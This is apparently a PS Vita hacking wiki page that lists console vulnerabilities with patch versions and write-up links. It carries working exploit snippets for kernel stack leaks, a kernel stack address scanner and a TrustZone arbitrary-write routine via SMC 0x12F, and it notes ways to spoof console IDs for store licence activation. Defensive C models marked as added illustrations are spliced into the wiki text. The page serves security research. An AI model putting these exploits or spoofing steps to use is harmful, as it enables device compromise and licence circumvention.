The bug lies in the gamesave parser of the bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies each line into a list of buffers. However, it doesn't validate the length, so if we put the delimiter \n far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. However, it is in the data section; luckily for us, the content after the buffer is the list that contains the destinations for the other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want, which gives us an arbitrary write primitive.<br />
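As an added illustration (not the game's code; slot sizes, names and sample saves are constructed here), this is the same line-by-line copy with the per-line bound the text says the parser lacks, so an overlong line is rejected before it can run past its slot into the data that follows.<br />

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not the game's code. A line-oriented savedata
 * parser of the kind the text describes ('\n'-delimited lines copied
 * into fixed-size slots), with the per-line length check the game
 * lacks. Slot size and count are constructed; the game's real layout
 * is not known here. */

#define SLOT_SIZE 32   /* constructed: bytes per line slot, incl. NUL */
#define MAX_SLOTS 8    /* constructed: number of line slots */

enum parse_result {
    PARSE_OK = 0,
    PARSE_LINE_TOO_LONG = -1,   /* a line would not fit its slot */
    PARSE_TOO_MANY_LINES = -2   /* more lines than slots */
};

struct save_table {
    char slots[MAX_SLOTS][SLOT_SIZE];
    size_t nlines;     /* lines successfully stored */
    size_t bad_line;   /* index of the rejected line, if any */
};

/* Parse `len` bytes of save text into `tbl`. The bound is checked
 * before any byte is copied, so a line of SLOT_SIZE bytes or more is
 * rejected rather than written past its slot into whatever follows
 * the slot array (on the page, a table of destination pointers). */
enum parse_result parse_save(const char *data, size_t len,
                             struct save_table *tbl)
{
    const char *p = data, *end = data + len;

    memset(tbl, 0, sizeof *tbl);
    while (p < end) {
        const char *nl = memchr(p, '\n', (size_t)(end - p));
        size_t linelen = nl ? (size_t)(nl - p) : (size_t)(end - p);

        if (tbl->nlines >= MAX_SLOTS) {
            tbl->bad_line = tbl->nlines;
            return PARSE_TOO_MANY_LINES;
        }
        if (linelen >= SLOT_SIZE) {   /* leave room for the NUL */
            tbl->bad_line = tbl->nlines;
            return PARSE_LINE_TOO_LONG;
        }
        memcpy(tbl->slots[tbl->nlines], p, linelen);
        tbl->slots[tbl->nlines][linelen] = '\0';
        tbl->nlines++;
        p = nl ? nl + 1 : end;
    }
    return PARSE_OK;
}

/* Constructed samples: a well-formed save, and one whose second line
 * is 40 bytes, longer than a slot. */
static const char SAMPLE_GOOD[] = "name=player\nscore=100\n";
static const char SAMPLE_BAD[] =
    "ok\n" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "\n";

int main(void)
{
    struct save_table t;
    enum parse_result r;

    r = parse_save(SAMPLE_GOOD, sizeof SAMPLE_GOOD - 1, &t);
    printf("good: result %d, %zu lines, slot[1]=\"%s\"\n",
           (int)r, t.nlines, t.slots[1]);
    r = parse_save(SAMPLE_BAD, sizeof SAMPLE_BAD - 1, &t);
    printf("bad: result %d, rejected line %zu\n", (int)r, t.bad_line);
    return 0;
}
```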
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn't sanity-check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that however much Sony secures the PSVita store, we will always be able to activate as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can index past the end of the syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
Calling a syscall with an invalid syscall id ends the SVC handler without clearing the syscall table vaddr that was left in r0.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some syscalls that interest you so they run in a kernel context (for example sceIoOpen).<br />
Then call sceIoDevctl and get up to 0x3FF bytes of that kernel stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available, instead of returning NULL it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
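As an added illustration (not SceNetPs code; all names and the interleaving driver are hypothetical), this models the race just described, a handler that blocks in the allocator with the global lock released while another thread closes the socket, and the usual fix: pin the socket with a reference before the blocking point so close() can only defer the release.<br />

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Added illustration, not SceNetPs code. The interleaving is driven
 * step by step instead of with threads so the outcome is
 * deterministic. All names are hypothetical. */

/* memsz as the page gives it: bits 16..28 of flags. Only sizes in
 * (0x80, 0x1000] take the heap path that can block. */
size_t ioctl_memsz(unsigned flags) { return (flags >> 16) & 0x1FFF; }

int ioctl_takes_heap_path(unsigned flags)
{
    size_t m = ioctl_memsz(flags);
    return m > 0x80 && m <= 0x1000;
}

struct net_socket {
    int refs;       /* descriptor reference + in-flight operations */
    int closed;     /* descriptor reference already dropped */
    int released;   /* set when the object is really torn down */
    /* stands in for the vtable slot the page's snippet calls */
    int (*vt_ioctl)(struct net_socket *, int, unsigned, char *);
};

static void socket_put(struct net_socket *s)
{
    if (--s->refs == 0)
        s->released = 1;   /* a real implementation would free here */
}

/* close(): drop the descriptor's reference. While an ioctl is in
 * flight the object survives; the last socket_put releases it. */
int socket_close(struct net_socket *s)
{
    if (s->closed)
        return -1;
    s->closed = 1;
    socket_put(s);
    return 0;
}

/* Phase 1, under the global lock: validate, pin the socket, then do the
 * allocation that may block with the lock released. Pinning before the
 * blocking point is the fix; the page's bug holds no such reference. */
struct net_socket *ioctl_begin(struct net_socket *s, unsigned flags, char **mem)
{
    if (!ioctl_takes_heap_path(flags) || s->closed)
        return NULL;
    s->refs++;                          /* pin across the blocking point */
    *mem = malloc(ioctl_memsz(flags));  /* may block; lock dropped meanwhile */
    if (!*mem) {
        socket_put(s);
        return NULL;
    }
    return s;
}

/* Phase 2, lock reacquired: the vtable call the page quotes, then unpin.
 * If the socket was closed while we waited, the object is still valid
 * because we hold a reference, so this is a clean error, not a UAF. */
int ioctl_end(struct net_socket *s, unsigned flags, char *mem)
{
    int rc = s->closed ? -2 : s->vt_ioctl(s, 11, flags, mem);
    free(mem);
    socket_put(s);
    return rc;
}

/* Hypothetical vtable target: just reports the op code it was given. */
int echo_ioctl(struct net_socket *s, int op, unsigned flags, char *mem)
{
    (void)s; (void)flags; (void)mem;
    return op;
}

/* The page's interleaving: close lands while the ioctl waits in malloc.
 * Returns 1 if the socket survived until ioctl_end and was released
 * only afterwards. */
int scenario_close_during_ioctl(void)
{
    struct net_socket s = { 1, 0, 0, echo_ioctl };
    const unsigned flags = 0x01000000u;   /* memsz = 0x100 */
    char *mem = NULL;

    if (ioctl_begin(&s, flags, &mem) != &s) return 0;
    if (socket_close(&s) != 0 || s.released) return 0;  /* deferred */
    if (ioctl_end(&s, flags, mem) != -2) return 0;
    return s.released == 1 && s.refs == 0;
}

/* No close in between: the vtable call runs and the socket stays open. */
int scenario_normal_ioctl(void)
{
    struct net_socket s = { 1, 0, 0, echo_ioctl };
    char *mem = NULL;

    if (ioctl_begin(&s, 0x01000000u, &mem) != &s) return 0;
    if (ioctl_end(&s, 0x01000000u, mem) != 11) return 0;
    return s.released == 0 && s.refs == 1;
}

int main(void)
{
    printf("close during ioctl handled safely: %d\n", scenario_close_during_ioctl());
    printf("normal ioctl: %d\n", scenario_normal_ioctl());
    return 0;
}
```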
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the functions used are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and, through an out-of-bounds access, to get kernel code execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xor'ed, otherwise sceNgsRackGetRequiredMemorySize returns SCE_NGS_ERROR_INVALID_PARAM (the error code the loop below tests for).<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (starting the scan at the 1.692 DEVCTL_STACK_FRAME offset finds the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#include <string.h><br />
#include <psp2/io/devctl.h><br />
#include <psp2/kernel/threadmgr.h><br />
#include <psp2/ngs.h><br />
<br />
#define DEVCTL_STACK_FRAME 0x728 // offset of the devctl buffer inside the kernel stack, specific to 1.692<br />
<br />
SceInt32 gRet = 0; // last return value, kept global for debugging<br />
<br />
// Returns the kernel stack base, or 0xFFFFFFFF if no candidate page answered.<br />
// SCE_NGS_VOICE_DEFINITION_MAGIC / _FLAGS are the constants used by the exploit sources linked above.<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // Fake voice definition, left behind on the kernel stack by the devctl below<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, sizeof(voiceDef));<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2 * 1000 * 1000);<br />
<br />
    // Walk candidate pages; on these old firmwares the address is passed un-xor'ed<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition *)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        return addr - DEVCTL_STACK_FRAME; // the fake definition was found: this page is the kernel stack<br />
    }<br />
    return 0xFFFFFFFF;<br />
}<br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. The same memcpy may also be present at other levels (TrustZone? NSKBL?); this has not been verified.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two bugs below are exploited by calling memcpy with a negative length: together they let the out-of-bounds primitive be used without copying an enormous buffer and without triggering a segmentation fault, because a negative length ends up copying nothing.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, dst + len wraps to a value smaller than dst (integer overflow). The later comparison against it then evaluates false whether it is signed or unsigned, so memcpy believes there are fewer than 32 bytes left to copy and skips the block path.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the remaining length is compared as a signed integer, so a negative length simply bypasses the copy loop.<br />
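The two defects, as an added example rather than code from this wiki or from the Vita libc: a constructed C model of the memcpy fast-path logic (a wrapping end-pointer test for the 32-byte path, then a signed tail loop) next to a bounded copy that a caller should use. The model shows that a negative length copies nothing and touches nothing, which is the behaviour h-encore relies on, while <code>bounded_copy</code> takes the length as <code>size_t</code> and rejects the same value as too large. Function names and the exact shape of the checks are assumptions.<br />
<br />
```c
/* Model of the two memcpy defects beside a bounded copy. Constructed
 * stand-in for the fast-path logic described above, not the Vita libc. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Copies len bytes the way the flawed routine does and returns how many
 * bytes were actually written. len is signed, as the routine treats it. */
size_t memcpy_model(unsigned char *dst, const unsigned char *src, int len) {
    uintptr_t d = (uintptr_t)dst;
    /* Bug 1: the end pointer is dst + len. For len < 0 it wraps below dst,
     * so the "at least 32 bytes to go?" test is false whether the compare
     * is signed or unsigned, and the 32-byte block path is skipped. */
    uintptr_t end = d + (uintptr_t)(intptr_t)len;
    size_t copied = 0;
    if (end >= d + 32) {
        size_t bulk = (size_t)(end - d) & ~(size_t)31;
        memcpy(dst, src, bulk);
        copied = bulk;
    }
    /* Bug 2: the tail count is compared as a signed integer, so a negative
     * value means "nothing left" and the byte loop never runs. */
    int remaining = len - (int)copied;
    for (int i = 0; i < remaining; i++)
        dst[copied + (size_t)i] = src[copied + (size_t)i];
    if (remaining > 0) copied += (size_t)remaining;
    return copied;
}

/* What a caller should do instead: carry the length as size_t and bound it
 * by both buffers. A negative int cast to size_t is huge and is rejected
 * by the same comparison, instead of silently copying nothing. */
int bounded_copy(unsigned char *dst, size_t dst_cap,
                 const unsigned char *src, size_t src_len, size_t len) {
    if (len > dst_cap || len > src_len) return -1;
    memcpy(dst, src, len);
    return 0;
}

/* Self-check on constructed buffers: 1 if a negative length copies nothing
 * and leaves dst untouched, a positive length copies exactly len, and
 * bounded_copy rejects the negative length while accepting a sane one. */
int memcpy_model_selftest(void) {
    unsigned char src[64], dst[64];
    for (int i = 0; i < 64; i++) { src[i] = (unsigned char)i; dst[i] = 0xAA; }
    if (memcpy_model(dst, src, -8) != 0 || dst[0] != 0xAA) return 0;
    if (memcpy_model(dst, src, 40) != 40 || dst[39] != 39 || dst[40] != 0xAA) return 0;
    if (bounded_copy(dst, sizeof dst, src, sizeof src, (size_t)(int)-8) != -1) return 0;
    return bounded_copy(dst, sizeof dst, src, sizeof src, 16) == 0;
}
```
<br />
The silent no-op is exactly what makes the length useful to an attacker: a copy routine that faulted or copied the full wrapped size would have killed the exploit. The fix is not in memcpy but in never letting a signed, unvalidated length reach it.<br />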
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed in 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed in 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization: with kernel execution, the eMMC MBR can be modified to change the block size. At the time yifan was trying to exploit it through an adjacent malloc (controlled_size), could not find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw in error code propagation in NSKBL: a function does not check an error return, and had it done so, the value corrupted by the buffer overflow would never have been used. Later on, the overwritten field is used in a separate call.<br />
<br />
Together these give a usable buffer overflow in the data section and early code execution on the ARM side in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
An import/export list of the 1.80 TrustZone modules is available [https://pastebin.com/59pe8jBg there].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
// Copy 8 bytes from src (Non-secure Kernel memory) to dst (TrustZone address).<br />
// dst - 0x00560000 must be a multiple of 0x80, since the SMC only adds index * 0x80 to the shared memory base.<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    // Plant the data in shared memory: NS 0x00400028 is TZ 0x00560028, i.e. tz_addr + 0x28<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    // sm_handle = tz_addr >> 1, with tz_addr pointing at the shared region itself<br />
    register uintptr_t r0 asm("r0") = 0x00560000 >> 1;<br />
    // index chosen so that shared_mem_base + index * 0x80 == dst (wraps mod 2^32)<br />
    register uintptr_t r1 asm("r1") = (dst - 0x00560000) / 0x80;<br />
<br />
    // Arguments are pinned to r0/r1 above so the compiler cannot allocate them to registers the movs would clobber<br />
    asm volatile(<br />
        "movw r12, #0x12F\n\t"<br />
        "smc #0\n\t"<br />
        : "+r"(r0), "+r"(r1)<br />
        : : "r2", "r3", "r12", "memory"<br />
    );<br />
}<br />
</source><br />
<br />
To achieve code execution, set dst to the SMC table address: the 8-byte write plants two 4-byte function pointers in the table.<br />
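The data flow of SMC 0x12F, as an added example that is not the wiki's or Sony's code: a constructed C model of the handler over a flat 1 MiB stand-in for TrustZone memory, driven by the same call pattern as <code>tz_memcpy_8</code> above, next to the argument validation the real handler lacks. The unchecked version derives source and destination exactly as described, <code>(sm_handle << 1) + 0x28</code> and <code>shared_mem_base + index * 0x80</code> with both wrapping mod 2^32, and lets the planted 8 bytes land on a fake SMC table; the checked version accepts only a handle that names an SM object it owns and an index below 0x5000 / 0x80 = 0xA0. The window base, the SMC table address and the single SM object address are model assumptions; 0x00560000 and 0x5000 come from the page.<br />
<br />
```c
/* Model of SMC 0x12F over a flat stand-in for TrustZone memory, beside the
 * argument validation it lacks. Constructed example, not Sony's monitor. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TZ_BASE    0x00500000u          /* start of the modelled window (assumption) */
#define TZ_SIZE    0x00100000u
#define SHM_BASE   0x00560000u          /* shared region as the Secure Kernel sees it (page) */
#define SHM_SIZE   0x5000u              /* its size (page) */
#define SHM_BLOCKS (SHM_SIZE / 0x80)    /* 0xA0 valid indices */
#define SMC_TABLE  0x00520000u          /* fake SMC table inside the window (assumption) */
#define SM_OBJECT  0x00540000u          /* the one SM object the model owns (assumption) */

static uint8_t tz_mem[TZ_SIZE];

/* Maps a modelled TZ address to the backing array; NULL outside the window. */
static uint8_t *tz_ptr(uint32_t addr) {
    if (addr < TZ_BASE || addr + 8 > TZ_BASE + TZ_SIZE) return NULL;
    return tz_mem + (addr - TZ_BASE);
}

/* Unchecked handler: the two address derivations and the 8-byte copy. */
int smc_12f_unchecked(uint32_t sm_handle, uint32_t index) {
    uint8_t *src = tz_ptr((sm_handle << 1) + 0x28);
    uint8_t *dst = tz_ptr(SHM_BASE + index * 0x80);  /* wraps mod 2^32, as on the device */
    if (!src || !dst) return -3;                      /* only the model's own window limit */
    memcpy(dst, src, 8);
    return 0;
}

/* Checked handler: sm_handle must name an SM object the monitor owns and
 * index must stay inside the 0x5000-byte shared region. */
int smc_12f_checked(uint32_t sm_handle, uint32_t index) {
    if (sm_handle != (SM_OBJECT >> 1)) return -1;
    if (index >= SHM_BLOCKS) return -2;
    return smc_12f_unchecked(sm_handle, index);
}

/* The exploit's call pattern: the Non-secure Kernel's write to 0x00400028
 * lands at 0x00560028, sm_handle points at the shared region itself so the
 * handler reads the planted bytes back, and index is chosen so that
 * SHM_BASE + index * 0x80 wraps around to dst. */
static int plant_tz_write(int (*handler)(uint32_t, uint32_t),
                          uint32_t dst, const uint8_t payload[8]) {
    memcpy(tz_ptr(SHM_BASE + 0x28), payload, 8);
    uint32_t sm_handle = SHM_BASE >> 1;
    uint32_t index = (dst - SHM_BASE) / 0x80;
    return handler(sm_handle, index);
}

static const uint8_t k_payload[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };

/* 1 if the unchecked handler let the payload overwrite the fake SMC table. */
int demo_unchecked_overwrites_smc_table(void) {
    memset(tz_mem, 0, sizeof tz_mem);
    int rc = plant_tz_write(smc_12f_unchecked, SMC_TABLE, k_payload);
    return rc == 0 && memcmp(tz_ptr(SMC_TABLE), k_payload, 8) == 0;
}

/* Return code of the checked handler for the same call (-1: forged handle);
 * 99 if the table was modified anyway. */
int demo_checked_rejects_forged_handle(void) {
    static const uint8_t zero[8];
    memset(tz_mem, 0, sizeof tz_mem);
    int rc = plant_tz_write(smc_12f_checked, SMC_TABLE, k_payload);
    if (memcmp(tz_ptr(SMC_TABLE), zero, 8) != 0) return 99;
    return rc;
}
```
<br />
Two things to take from the model: a handle that is just a shifted address is not a capability, since the caller can make it point anywhere (here at the shared region, turning the leak into a copy of attacker data), and an index into a fixed-size region must be bounded before it is scaled, because the scaling itself wraps and turns a small region into the whole address space.<br />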
<br />
Patched somewhere after 1.80 and before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The DMAC5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time into a key slot. This makes it possible to recover plaintext AES keys by bruteforce: because each 4-byte word can be replaced independently, a 128-bit key falls to four separate 2^32 searches rather than one 2^128 search.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) F00D secure_kernel module loading does not check the source address, which provides an oracle that allows a memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
Not known to be patched (unverified).<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) Not an exploit by itself, despite the name: just the [https://github.com/TeamMolecule/petite-mort tools used to glitch the bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
